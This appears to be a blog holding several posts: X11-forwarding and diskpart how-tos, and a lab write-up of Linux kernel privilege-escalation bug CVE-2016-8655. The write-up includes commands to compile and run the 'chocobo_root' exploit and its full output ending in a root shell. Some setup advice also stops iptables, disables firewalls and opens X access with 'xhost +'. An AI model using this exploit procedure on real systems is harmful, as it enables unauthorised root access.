All being well, the sshd service will be fully restarted. As a funny little test, install “xeyes.” Use the command:

            yum -y install xeyes.

It is also prudent to check that the firewall is not blocking the forwarded requests. Iptables‘ configuration may need to be adjusted if they are. To turn off Iptables on a temporary basis, you can use the command:

            service iptables stop

On the Windows guest, the first requirement is to install PuTTY, which provides the mechanism to forward the display data between the host (the Linux server) and guest (your Windows machine). If you don’t already have PuTTY, download the PuTTY application from the PuTTY website and install it. I’d suggest using the full download package.

There are many display managers you can use. In this example we are using Xming, which is free and downloadable from sourceforge.net. Download Xming to your Windows PC and run the setup. During installation, you might see a number of options; I’d suggest going with the defaults.

Once Xming is installed you are ready to try out X11 forwarding. You will need to allow the Windows firewall to be modified to allow Xming forwarding to work. This should automatically pop up and request the required access.

There are also two settings in PuTTY that need to be changed to make X11 forwarding work. Open PuTTY as normal, filling in the IP address or DNS alias name. Before clicking OK to connect to the server, go to the connection menu in PuTTY, select SSH, X11 and tick the box X11 forwarding. The xdisplay location should also be set to localhost:0, which is basically the display you are working on currently.

PuTTY ConfigurationPuTTY ConfigurationYou can now connect to the Linux server using PuTTY. At the command line, run the command: xeyes. Hopefully a silly pair of comedy eyes will pop up that follow your cursor around the screen. To keep the terminal available for additional commands after you launch the X11 forwarded application, use an & at the end of the command to prevent tying up the terminal in question.Xeyes exampleXeyes exampleNow that you have seen it in action, it is perhaps time to share how it all works.

No matter which GUI you use on your Linux host, GNOME or KDE, they both have what is termed a xdisplay manager that underlies the GUI portion of the display. It is a network protocol that was designed from the outset to allow items to be forwarded to whichever destination is required.

X11 Forwarding on Mac

X11 forwarding on Mac is just as easy. Download Quartz and install it as you would any other Mac package. Quartz is another instance of display management. To start using X11 forwarding to your Mac, use the -X switch. In other words, the ssh command would look like this:

            ssh -X root@mylinuxhost   

To test it just type in the command xclock or xeyes, and, as if by magic, you get a basic clock or aforementioned eyes on your desktop.

 Posted by at 9:09 chiều
Th1 052017
 

vd:
+ máy có X, IP=192.168.1.200
+ máy server, IP=192.168.1.100

– Từ server:
mở shell, gỏ vào:

DISPLAY=192.168.1.200:0.0
export

– Từ client:
mở shell, gỏ vào:

xhost + 192.168.1.100

-Từ server, ngay cái shell ở bước trên, chạy cái installer của Oracle.
=> nếu may mắn :P cái của sổ installer sẽ nhảy ra dưới máy client (192.168.1.200) thay vì trên máy đang ngồi!

– Lưu ý: tắt mấy cái firewall :D

Th1 042017
 
Rất đơn giản, ta chỉ mất khoảng 3 phút để chuẩn bị và quá trình cài đặt sẽ nhanh hơn rất nhiều so với khi sử dụng ổ DVD Drive, các bạn xem video.

 

1. Đầu tiên gõ lệnh: diskpart
để tiến hành kích hoạt Microsoft Diskpart giúp ta phân vùng, tạo chức năng bootable – boot từ DOS cho hệ thống cho quá trình cài đặt Windows.
2. Tiếp tục gõ lệnh: list disk
để liệt kê các ổ đĩa trên hệ thống.
3. Sau khi gắn ổ RAM Drive (USB) vào máy, ta gõ lại lệnh: list disk
lúc này bạn có thể thấy ổ RAM Drive 4G xuất hiện.
4. Tiếp tục gõ lệnh: select disk 1
để chọn ổ USB của ta.
5. Gõ lệnh: clean
để xóa sạch ổ đĩa này, trước khi làm bạn chú ý trên ổ USB không chứa các dữ liệu quan trọng.
6. Gõ lệnh: create partition primary
để tạo partition và set cho nó primary.
7. Sau khi quá trình hoàn thành bạn gõ tiếp lệnh: active
để active cho phân vùng đó.
8. Gõ lệnh: format fs=fat32 quick
để tiến hành format nhanh ổ USB theo định dạng FAT32.
9. Tiếp tục gõ lệnh: assign

 Posted by at 10:07 sáng
Th12 302016
 

CVE-2016-8655

Overview

The net / packet / af_packet.c of Linux Kernel vulnerability of race condition, you can be promoted to root privileges from the general user privileges.

packet_set_ring is, when you create a ring buffer, if the version of the packet is a TPACKET_V3 initializes the structure timer_list. This value is, and then you set the version to TPACKET_V1 before packet_set_ring has finished calling the setsockopt, you can be the race by another thread. This problem leads to a use-after-free vulnerability of timer_list structure, it will lead to the result to gain root privileges. This vulnerability has been fixed by taking the lock_sock (SK) to packet_setsockopt when you change the version of the packet while the lock when the start of packet_set_ring.

CVSS v3

CVSS v3 Base Score 7.8 High
Vector CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Impact Score 5.9
Exploitability Score 1.8
Attack Vector (AV) Local
Attack Complexity (AC) Low
Privileges Required (PR) Low
User Interaction (UI) None
Scope (S) Unchanged
Confidentiality (C) High
Integrity (I) High
Availability (A) High

Solution, mitigation information

  • Upgrading to Linux Kernel 4.8.14 or higher

Affected software versions

  • Linux Kernel 4.8.13

Technical Details

Operation verification of Exploit

chocobo_root.c prepared compatible environment to

khanhnn@CVE-2016-8655 ~ $ sudo apt-get install linux-image-4.4.0-51-generic linux-headers-4.4.0-51-generic
khanhnn@CVE-2016-8655 ~ $ sudo apt-get remove linux-image-4.4.0-53-generic linux-headers-4.4.0-53-generic
khanhnn@CVE-2016-8655 ~ $ sudo reboot
khanhnn@CVE-2016-8655 ~ $ uname -a
Linux CVE-2016-8655.test 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
khanhnn@CVE-2016-8655 ~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

Setting compile and file capabilities

khanhnn@CVE-2016-8655 ~ $ gcc chocobo_root.c -o chocobo_root -lpthread
khanhnn@CVE-2016-8655 ~ $ ls -l chocobo_root
khanhnn@CVE-2016-8655 ~ $ sudo apt-get install libcap2-bin
khanhnn@CVE-2016-8655 ~ $ sudo setcap cap_net_raw+ep /home/kosuke/chocobo_root
khanhnn@CVE-2016-8655 ~ $ getcap ./chocobo_root
./chocobo_root = cap_net_raw+ep

Run

khanhnn@CVE-2016-8655 ~ $ ./chocobo_root
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 102949, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 122693, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 124639, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 564981, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@CVE-2016-8655 ~ # id
uid=0(root) gid=0(root) groups=0(root),1001(kosuke)

Summary

As there was a hole that you can enter the service, there is likely to be taken to root in the authority file with cap_net_raw capability, or by if this vulnerability long as it can change the behavior of the process.

Sources of information necessary to track

references

  • http://securityaffairs.co/wordpress/54168/hacking/cve-2016-8655-linux-kernel.html
  • http://seclists.org/oss-sec/2016/q4/607
  • https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c
  • http://jvndb.jvn.jp/ja/contents/2016/JVNDB-2016-006125.html
  • https://wiki.archlinuxjp.org/index.php/%E3%82%B1%E3%82%A4%E3%83%91%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3
  • http://www.vagrantbox.es/
 Posted by at 10:16 sáng